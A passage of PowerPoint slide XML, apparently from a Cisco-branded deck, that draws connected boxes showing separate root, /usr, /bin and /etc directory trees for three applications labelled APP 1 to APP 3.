            <a:ext cx="240012" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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28D76356-BB7F-3D4B-879D-53E622E471B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3524154" y="2396888"/>
            <a:ext cx="327557" cy="1840020"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Elbow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40E38A7-C51E-664B-AA0C-E457DD87BD18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5365503" y="2385620"/>
            <a:ext cx="337494" cy="1852617"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{905DAFE8-BADD-0D48-B45F-8D23B34C2C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4438344" y="3308860"/>
            <a:ext cx="341416" cy="2216"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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48A8DE59-F5C9-5646-908E-245F7FDAC728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="0"/>
            <a:endCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2695598" y="2772771"/>
            <a:ext cx="144648" cy="1"/>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440BB330-C5D5-D848-BE10-E19C7C0FB869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="16" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2430633" y="2052296"/>
            <a:ext cx="144647" cy="529933"/>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69FF63E1-6101-E543-AA52-CBD61128AC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2694293" y="2315955"/>
            <a:ext cx="144647" cy="2614"/>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72FA12C1-A43B-BE4D-831A-19DC303E15EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2956497" y="2056364"/>
            <a:ext cx="144647" cy="521796"/>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50" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC1A1AE-2644-684D-AA74-8EC865F49F61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855390" y="1917366"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7462F3FD-CFA1-9049-BC65-40A713F21FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4268043" y="2372875"/>
            <a:ext cx="682226"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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6189446-ADFB-5348-BF1C-EFD8CE5230CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4382709" y="1917366"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB3EC8F-C5C3-274C-AC29-0A15EF2D2FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907119" y="1917366"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Elbow Connector 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70ED04C2-3175-7242-8B91-B9297161E7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="0"/>
            <a:endCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4535908" y="2756985"/>
            <a:ext cx="147500" cy="1003"/>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5CECD0FB-FCDD-7545-964D-4D568CFF6647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="50" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4271867" y="2035585"/>
            <a:ext cx="144647" cy="529933"/>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87D5447F-55B0-2545-B3A8-012703992FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="52" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4535527" y="2299245"/>
            <a:ext cx="144647" cy="2614"/>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DE92A96C-9419-504C-AAB4-A458C5F6EF6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4797731" y="2039653"/>
            <a:ext cx="144647" cy="521796"/>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60" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE49E3F7-CA13-F343-A04E-42C068884583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706742" y="1913563"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A93DC7C0-7F94-F748-8FF3-E5836CA28863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119395" y="2369071"/>
            <a:ext cx="682226"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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9029D46-9813-1B49-B287-EE7BEFC16787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234061" y="1913563"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DF1D2C-E4F2-BB41-AEEC-7B4872C2F808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758471" y="1913563"/>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000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Elbow Connector 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC46139B-2FAD-D545-B59C-C8F1B6FE0399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="0"/>
            <a:endCxn id="61" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6382923" y="2757521"/>
            <a:ext cx="155224" cy="51"/>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5" name="Elbow Connector 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0343C1C-B4D2-CF49-A320-E77EBC9CEBF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="0"/>
            <a:endCxn id="60" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6123220" y="2031783"/>
            <a:ext cx="144647" cy="529933"/>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F2A65AD1-A636-2848-8C50-3736FD9F97AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="0"/>
            <a:endCxn id="62" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6386879" y="2295441"/>
            <a:ext cx="144647" cy="2614"/>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7" name="Elbow Connector 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1158E4F0-305E-F143-B017-BB4B122783E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="0"/>
            <a:endCxn id="63" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6649084" y="2035850"/>
            <a:ext cx="144647" cy="521796"/>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D22404E9-853A-C542-88DB-D69F236A6AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1977907" y="1639941"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="TextBox 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A1517A-FC70-6344-AE33-B54742C7490F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502955" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="TextBox 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA471BD-C117-DE49-8D00-A9C7C3A27539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028819" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="TextBox 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A97255F2-F29D-E245-9700-75139AB08563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3812365" y="1639941"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="TextBox 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC746EF-1C8C-A14B-A071-6499FCDBCB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337413" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="TextBox 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B53DF85C-C12F-BB4B-B391-7B13C3BE7DA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863277" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="TextBox 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62FC9781-5E83-E942-88E1-268A44E2EC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5670685" y="1632462"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="TextBox 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF18691B-E308-3242-AB27-6725C379B48D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6195733" y="1638761"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="TextBox 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9BA090B-BB50-CA4D-A51C-667569492579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6721597" y="1638761"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
